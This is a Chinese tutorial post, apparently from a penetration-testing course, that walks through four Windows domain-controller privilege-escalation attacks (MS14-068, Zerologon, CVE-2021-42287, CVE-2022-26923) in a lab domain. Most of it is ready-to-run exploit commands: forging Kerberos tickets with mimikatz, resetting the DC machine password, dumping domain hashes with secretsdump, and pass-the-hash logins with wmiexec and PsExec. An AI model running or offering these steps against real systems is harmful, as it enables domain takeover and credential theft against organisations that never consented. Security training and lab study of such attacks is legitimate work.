第106天:权限提升-WIN 系统AD域控NetLogonADCSPACKDCCVE 漏洞

news2024/12/27 10:04:43

目录

案例一:WIN-域控提权-CVE-2014-6324

案例二:WIN-域控提权-CVE-2020-1472

案例三:WIN-域控提权-CVE-2021-42287

案例四:WIN-域控提权-CVE-2022-26923


案例一:WIN-域控提权-CVE-2014-6324

首先先部署域控

项目下载地址

https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
https://github.com/gentilkiwi/mimikatz
https://github.com/crupper/Forensics-Tool-Wiki/tree/master/windowsTools

获得域用户的suid值

whoami /user

通过查看时间查看域控主机名

net time /domain

 ping域控主机名来查看ip

获取计算机的一些信息

net config workstation

利用工具伪造kerberos协议认证证书

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址
ms14-068.exe -u jie@qq.com -p 1234.com -s S-1-5-21-3844935259-2139444640-2602687446-1104 -d 192.168.172.138

启动mimikatz

清空当前的票据缓存

kerberos::purge  清空

kerberos::list   列出

导入伪造的票据

kerberos::ptc "TGT_jie@qq.com.ccache"

查看c盘文件

dir \\dc1.qq.com\C$

利用psexec连接域控

PsExec.exe \\dc1.qq.com cmd

查看ip已经变成了域控机的ip

案例二:WIN-域控提权-CVE-2020-1472

影响范围以及利用条件

CVE-2020-1472 是继 MS17010 之后好用的 NetLogon 特权域控提权漏洞,
影响 Windows Server 2008R2 Windows Server 2019 的多个版本系统,
只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞 .
该漏洞不要求当前计算机在域内 , 也不要求当前计算机操作系统为 Windows.

资源下载地址

POC:https://github.com/SecuraBV/CVE-2020-1472
EXP:https://github.com/dirkjanm/CVE-2020-1472
Impacket:https://github.com/fortra/impacket

获得计算机名

nbtscan -v -h 192.168.3.21

测试漏洞是否能够正常使用

python3 zerologon_tester.py DC1 192.168.172.138

重置空密码

python3 cve-2020-1472-exploit.py DC1 192.168.172.138

连接后导出哈希

python3 secretsdump.py qq.com/DC1\$@192.168.172.138 -no-pass

这里尝试利用administrator进行登录

python3 wmiexec.py Administrator@192.168.172.138 -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942

也可以在前面加上域名进行访问

案例三:WIN-域控提权-CVE-2021-42287

利用条件

可以访问域控主机
需要域用户账号密码

资源下载地址:https://github.com/safebuffer/sam-the-admin

命令

python3 sam_the_admin.py 域名/'域控主机账号:密码'  -dc-ip 域控ip -shell

python3 sam_the_admin.py qq/'administrator:123.com' -dc-ip 192.168.172.138 -shell

案例四:WIN-域控提权-CVE-2022-26923

利用条件

知道一个域控普通用户的账号密码

并且域控内有ca证书服务器

利用命令查看ca名以及计算机min

certutil -config - -ping

资源下载地址:GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse

安装必要的插件

python3 .\setup.py install

 申请一个证书

certipy req 'ip/域用户名:密码@域控计算机名' -target-ip 域控ip -ca abc-DC1-CA -template User -debug

certipy req '192.168.172.145/jie:123.com@dc1.abc.com' -target-ip 192.168.172.145 -ca abc-DC1-CA -template User -debug

检测证书

certipy auth -pfx jie.pfx -dc-ip 192.168.172.145 -debug

添加计算机账号

项目地址:GitHub - CravateRouge/bloodyAD: BloodyAD is an Active Directory Privilege Escalation Framework

python3 bloodyAD.py -d abc.com -u jie -p '123.com' --host 192.168.172.145 addComputer pwnmachine 'CVEPassword1234*'

 

 设置属性

python3 bloodyAD.py -d abc.com -u jie -p '123.com' --host 192.168.172.145 setAttribute 'CN=pwnmachine,CN=Computers,DC=abc,DC=com' dNSHostName '["dc1.abc.com"]'

利用添加的计算机账户来申请证书

certipy req '192.168.172.145/pwnmachine$:CVEPassword1234*@dc1.abc.com' -target-ip 192.168.172.145 -ca abc-DC1-CA -template Machine -debug

检测该证书的有效性

certipy auth -pfx dc1.pfx -dc-ip 192.168.172.145 -debug

利用机器用户的hash来导出系统的哈希

项目下载地址: GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.

sudo python3 secretsdump.py 'dc1$@192.168.172.145' -hashes :41907e434e325b51c0aeed7d2cc0fac3

利用admin的hash进行连接

python3 wmiexec.py Administrator@192.168.172.145 -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942

权限提升结束,参考文章:Active Directory 域服务特权提升漏洞 CVE-2022–26923

 

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1846454.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

神经阻滞术——慢性腰痛、颈痛与关节痛治疗的新选择

北京精诚博爱医院所实施的神经阻滞术是一种针对患者局部疼痛治疗手段,通过向特定部位注射局麻药或其他特定药物,来暂时性地阻断神经传导,进而达到减轻或消除疼痛的目的。这种疗法在慢性腰痛、颈痛或关节痛等常见疼痛疾病的治疗中,…

案例分享:同为科技与军工项目合作

国防数字化建设发展,同为科技提供智能PDU电源管理器系列产品与服务 项目要求描述: 竖装智能PDU电源管理器 63A输入 2P空气开关 SNMP协议智能型表头 3米310平方阻燃A级线缆 监测总输入电压、总负载电流、总负载视在功率、有功功率、无功功率、总负载…

构建有效的财务规划合作伙伴关系

在这个日益注重分类、定义和正规化的时代,财务规划与分析作为企业环境中发展最快的功能之一,已经从典型的数据管理角色逐步演变成企业框架中必不可少的身份。与其他新兴趋势一样,财务规划也开始采用更加创新的理念来吸引高技能投资&#xff0…

每个程序员都要有 3 份收入!

见字如面,我是军哥! 现在这个就业环境,是真的冷,找工作也确实相比前几年难太多。 程序员人群要想没有收入危机,未来的生活压力,我的建议是一定要提前构建自己的三份收入! 哪三份收入呢&#xff…

帮企商城PC端分销商城企业网站源码系统 带源代码包+搭建部署教程

系统概述 帮企商城 PC 端分销商城企业网站源码系统是一款集企业网站建设、商品管理、分销体系、支付系统等多种功能于一体的综合性平台。它为企业提供了一个全面的电子商务解决方案,帮助企业快速搭建自己的在线商城,并实现高效的运营和管理。 该系统采…

短视频批量下载工具源码逻辑解析(软件)

短视频批量提取第三篇关于视频提取下载的思路 一:概述 因为上一篇不完整,这里其实就是补充第二篇关于源码思路。这里不针对视频评论的提取,只对视频分享链接批量导入下载进行思路解析 二:难点 通常情况下如果直接访问详情页进行…

Hi3861 OpenHarmony嵌入式应用入门--LiteOS Thread

目录 Thread API 主要接口说明 测试代码编写 代码分析 hi3861使用的实时系统主要是基于Huawei LiteOS-M,这是华为针对物联网领域推出的轻量级物联网操作系统内核。LiteOS-M是Huawei LiteOS的一个分支,专为IoT领域构建,主要面向没有MMU&am…

永磁同步电机FOC调试记录(一)

永磁同步电机FOC调试记录(一) 前言架构硬件架构软件架构 调试过程元器件选型开环控制编码器调试速度采样电流检测中断优先级的确定电流环部分烧坏IPM速度-电流环位置-电流环 结语 前言 这是我个人从零开始尝试永磁同步电机(PMSM)…

别只看影响因子了!又1本毕业神刊偷偷被On Hold了!请谨慎投递

【SciencePub学术】昨日,2023JCR正式发布,现在影响因子的话题依旧是“热搜第一”。大家可以根据自己的研究方向,参考最新发布的JCR报告进行投稿选刊。若大家对于投稿选刊方面有任何问题,都可联系张老师为您解答! 相关…

Qt源码阅读笔记:初步了解QtCore模块目录结构

Qt框架是一个跨平台的C应用程序框架,广泛用于开发图形用户界面程序以及用于无界面后台操作的工具和服务器。它由多个模块组成,其中QtCore模块提供了核心的非GUI功能。 QtCore 提供了元对象系统,扩展了c 在元对象系统的基础上,qt又…

timescaledb:创建real-time aggregate

创建hypertable【chz_a】 create table chz_a (time timestamp,device_id int8, value double precision,primary key (time) ); SELECT create_hypertable(chz_a, by_range(time) );往表里面写入数据 # 当天的数据 insert into chz_a (time, device_id, value) values (now(…

七人拼团:互助共赢,电商新动力

在当前繁荣的电商领域中,七人互助拼团模式以其别具一格的激励机制和互助合作理念,成为了消费者和商家共同瞩目的焦点。接下来,我们将详细解读这一模式中的直推激励、滑落补偿以及团队成就奖,并探讨其如何体现互助合作的精神。 一、…

Android面试题:App性能优化之电量优化和网络优化

本文首发于公众号“AntDream”,欢迎微信搜索“AntDream”或扫描文章底部二维码关注,和我一起每天进步一点点 电量优化 Doze模式 系统的行为进入Doze后看看App有没有奔溃就可以 Standby待机模式 针对某个应用 处于上述模式,App会无法访问…

Spring Boot中的各种事件

spring boot 各种事件贯穿整个启动的生命周期,读懂了这些事件也差不多理解了springboot的启动流程。 SpringApplicationRunListener中的事件 接口org.springframework.boot.SpringApplicationRunListener定义了spring启动过程中各个事件被触发的顶层方法 public …

内容安全复习 1 - 信息内容安全概述

文章目录 信息内容安全简介网络空间信息内容安全大模型 人工智能简介 信息内容安全简介 网络空间 网络空间是融合物理域、信息域、认知域和社会域,控制实体行为的信息活动空间。 上图展示了网络空间安全的结构。可以看到将网络空间划分为了网络域和内容域两个部分。…

图片的格式怎样在线转换?在线改图片格式的操作技巧

图片作为日常生活中常用的内容展示方式,面对不同的用途图片的格式也是不同的,那么怎样快速完成图片格式转换呢?通过软件来修改图片格式比较麻烦,现在可以在网上使用图片格式转换器工具来在线改图片格式,这种方式会更加…

RK3568技术笔记十六 QT5开发

背景知识 在阅读本章前,如果对下面所列举的知识点有一定的了解,将有助于更好的理解本章内容。 C基础知识,了解简单的类,继承,重载等面向对象概念;Linux基础知识,了解基本的Shell命令&#xff…

谷歌Chrome浏览器排查js内存溢出

1. 打开谷歌浏览器检查台 2. 点击memory 3. 点击开始快照录制,时隔一会儿录一次,多录几次 4. 进行快照对比

TMS与WMS海外仓系统:两者分别是什么、区别、结合使用的好处

TMS国际物流系统和WMS海外仓系统都旨在提升海外仓储物流作业的效率,不过他们在供应链中却各自发挥着不同的作用。 今天我们会深入的给大家介绍两者分别是什么,区别在哪,结合使用TMS国际物流系统和WMS海外仓系统的好处是什么。 1、了解WMS海…

AI+前端技术的结合(实现图片识别功能)

随着人工智能技术的不断发展,AI在前端设计页面中的应用变得越来越普遍。比如:在电商平台上,可以利用对象检测技术实现商品的自动识别和分类;人脸识别;车辆检测;图片识别等等......其中一个显著的应用是在图…